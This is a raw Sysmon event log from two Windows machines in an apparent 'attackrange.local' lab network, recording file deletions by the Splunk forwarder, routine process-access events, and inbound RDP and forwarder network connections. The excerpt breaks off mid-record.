23542300x8000000000000000981104Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:56.102{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5858480D542F84D18F1FE55EC603B9B6,SHA256=7F813771B41EDBCB3F8BCC5AD5F945CA55044DA91F9E1A1E428002FE00951C5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981103Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:56.102{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9141F20145C29623393242699D8D126,SHA256=1D20021859D75E6F37B93D9579C97275CD37A7E9238B47B043CFC5575A69D2AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981102Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:56.086{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC7CCF638C171C0EA8AABF5ABEB3EE05,SHA256=F8614D2B12A5132C83E0AFFD0389C6A9F11E2A2C066BFFB7C95EDEC90F6C758C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:56.094{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=975AE7D435A5B00FD8FF9FD53BFB4CB5,SHA256=8A44BD6C59E9EF3FAB4402DDF7738DD2F2C2D201D6E8470BE80E908BD86AC8E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:57.094{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F30573C8A591BFC0C0AC9115D11542D,SHA256=46B79A673173F9B15C07EDC9DD74C459734F50D06ECDD6D4E5E3DCC07757A0B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981106Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:57.305{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCA598ACC5EFE8B1B54E8F20E3DAA910,SHA256=E2EC739BF30E379AD765C28D9B01EC3893DA1067558F3509D7EDFFE7D8E19C9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981107Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:58.399{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AD90DA87C8D28A2346DBD53170541EB,SHA256=0FBE537741491921F48455A9D97B26FEB584CF583A1F1EF63DBCDF9CD01E2422,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:58.094{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=845DF968ED1F592C6794C15901D7E1FD,SHA256=0B2B7D3E88B6511ED3B880C28A3F3635A6ABC379D3A23656758FC1EFA5B317D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981109Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:59.805{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5858480D542F84D18F1FE55EC603B9B6,SHA256=7F813771B41EDBCB3F8BCC5AD5F945CA55044DA91F9E1A1E428002FE00951C5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981108Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:59.633{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BA7D528C7D0364AA654C21B55721907,SHA256=CDF76E13230BC72C1AEC2842813A25ED17D29078F4F705FAA430AEC118CE7860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:59.141{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9D3E078520F1CBDDD2E7B3FF7736CDD,SHA256=383D97201E5084115F0BA5EAC75B5BE504C2765BE4716B4CB3A6BDA4529A3244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:59.094{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A2985B0A1197F2BA92FCDEE5205E79F,SHA256=CC0DF3964DA655A9B45A4AB5FC03747A74DC4738095CD2995733803D71226E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:59.094{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE5307BA7383AAEF6206ACB93D829392,SHA256=4604BDD0E4EC91F64FCFF2D91BBA1CF13BE27B0F1F957FE12B6EDB4FF06997CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981111Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:00.728{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3A1DF6A0411A089D146BC57CE006619,SHA256=D4745B946F8C243C4AF1A67110AAC8BB8159A3389B1E056D5C7F1853E5798360,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D74-6151-AD00-00000000FD01}1312C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CC0-6151-1600-00000000FD01}12961772C:\Windows\system32\svchost.exe{5EBD8912-8D74-6151-AD00-00000000FD01}1312C:\Windows\System32\wsqmcons.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.954{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.563{5EBD8912-8CC0-6151-1100-00000000FD01}412NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=E6037D809013CF41D1EE8662DD9F1D7C,SHA256=A501EEAAB675C42401E9AA4557AF2DC9662B04F8A7C4A59AF3D8E08294C43D5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:58.167{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58781-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.141{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06C8D1D5C350B5B26FAF15B46C95BE7E,SHA256=AEE697EE8225590158FF9FCFC09E3FD634D96E44C1EB5F10AFF01AA0234319A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981110Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:57.031{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-49994-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981113Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:01.947{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF0AB84CEF0030B3BA48A064791CBC39,SHA256=452FC17963E451B9D9E73003A694D1A9B9D27CFDC6161B33BEE7A45FB60F2C62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:01.548{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A2985B0A1197F2BA92FCDEE5205E79F,SHA256=CC0DF3964DA655A9B45A4AB5FC03747A74DC4738095CD2995733803D71226E3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:01.532{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D75-6151-AE00-00000000FD01}5552C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:01.532{5EBD8912-8CC0-6151-1600-00000000FD01}12961772C:\Windows\system32\svchost.exe{5EBD8912-8D75-6151-AE00-00000000FD01}5552C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e0a4|c:\windows\system32\UBPM.dll+11662|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:01.532{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:01.532{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001056541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:59.096{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54228-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:01.251{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63C78188D769095C6BAC3EF3EF94B7F7,SHA256=38CE307E1077C849ECAF82B056F3BB86242F976EE28DC8D62453D8DD53E6369A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981112Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:57.896{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59530-false10.0.1.12-8000- 23542300x8000000000000000981114Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:02.994{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D345B0D18B466BA246096009B8ED34,SHA256=6E6AB021FF8776DF9571213B8819735A13AFCA3800C776C2E813863995534801,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:00.354{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59088-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:02.329{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AEA2395E487FA6001F4C826F306BB4D,SHA256=48269187DB57D89507413CC03BE8B5A9987CCE091AF77515BD62C9089FA89EDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:03.347{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 